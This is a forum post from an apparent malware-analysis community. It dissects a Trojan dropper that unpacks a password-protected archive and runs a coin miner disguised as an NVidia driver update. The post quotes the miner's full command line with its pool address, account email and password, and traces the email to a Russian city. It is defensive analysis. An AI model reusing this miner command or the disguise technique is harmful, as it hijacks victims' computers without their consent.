A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #32408  by EP_X0FF
 Wed Jan 09, 2019 9:38 am
ikolor wrote: Sun Jan 01, 2017 1:18 pm Please make selection ...2017

https://www.virustotal.com/en/file/ca2e ... 483276621/
Trojan muldrop with coin miner as payload.

SFX archive, next the actual malware dropper -> extracts files to %UserProfile%\Public. The main malware is inside a password-protected zip file called dokinz.zip. This zip file is unpacked by ConsoleApplication1.exe (also dropped by the malware) with the password "dokinzakbar" (hardcoded inside ConsoleApplication1.exe). After unpacking, ConsoleApplication1.exe executes the malicious script NVidiaDriverUpdate.vbs.

TL;DR: it is a cryptocurrency miner configured as
Code:
"NvidiaUpdater.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u kso-magnitka@yandex.ru -p 2101skymagicss -t 1", 0, true
where NvidiaUpdater.exe is a coin miner called "cpuminer-multi".

This email can be found in Google and leads to Magnitogorsk, Russia.

Posts moved.